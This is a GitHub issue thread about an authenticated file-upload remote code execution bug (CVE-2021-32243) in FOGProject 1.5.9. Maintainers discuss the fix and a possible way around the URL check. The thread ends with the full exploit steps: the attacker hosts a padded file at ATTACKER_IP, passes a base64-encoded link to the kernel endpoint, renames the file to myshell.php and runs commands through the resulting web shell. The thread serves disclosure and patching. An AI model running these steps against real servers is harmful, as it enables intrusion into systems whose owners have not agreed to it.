New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
FOGProject 1.5.9 - File Upload RCE (Authenticated) #422
Comments
|
I'm wanting to understand this more fully as I will admit I'm not fully versed on how to prevent RCE. What I'm gathering is to get this to run: You need to:
|
|
@mastacontrola Interesting. Someone with the pseudonym LaCashita contacted me in the FOG forums chat to report exactly this issue in February this year. To fix this issue I commited (and tested!) c41006e. I am fairly sure it does prevent from that particular issue reported here. Now you added bb4b762 which essentially just reverts the logic of the URL check. It's probably easier to comprehend the logic this way so that's good. Though I don't understand why you switched to use |
|
The only reason I switched to stripos was I was under the impression the checks you are referencing were not working. So I just made the search case insensitive. |
|
Ok, good to know. I think we can just leave it like that. Closing this issue now. |
|
I think this might be an incomplete fix. First, the filename: I had a look at a fresh Ubuntu 18.04+Apache installation and found the following in So, in addition to I guess using randomly-generated names is not easily possible. But is it possible to forbid suffixes completely? Or alternatively to only allow a list of known suffixes? Second, the URL check: It can likely be circumvented by adding the FOG URL inside the malicious URL, for example: I must admit, I have not tested this so there might be some code that prevents this. However, this is easy to fix by switching to |
|
@georgschoelly Thanks for your input on this!
|
|
Thanks a lot! |
|
This CVE-2021-32243 has been fixed in 1.5.10 (2023-03-05). |
Create an empty 10Mb file.
dd if=/dev/zero of=myshell bs=10485760 count=1
Add your PHP code to the end of the file created in the step 1.
echo '' >> myshell
Put the file "myshell" accessible through HTTP.
$ cp myshell /var/www/html
Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).
$ echo "http://ATTACKER_IP/myshell" | base64
aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=
Visit
http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64
Example:
http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64
Appears a textbox, change the Kernel Name (bzImage32) to myshell.php
and click on Install.
Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=whoami execute system whoami command
The text was updated successfully, but these errors were encountered: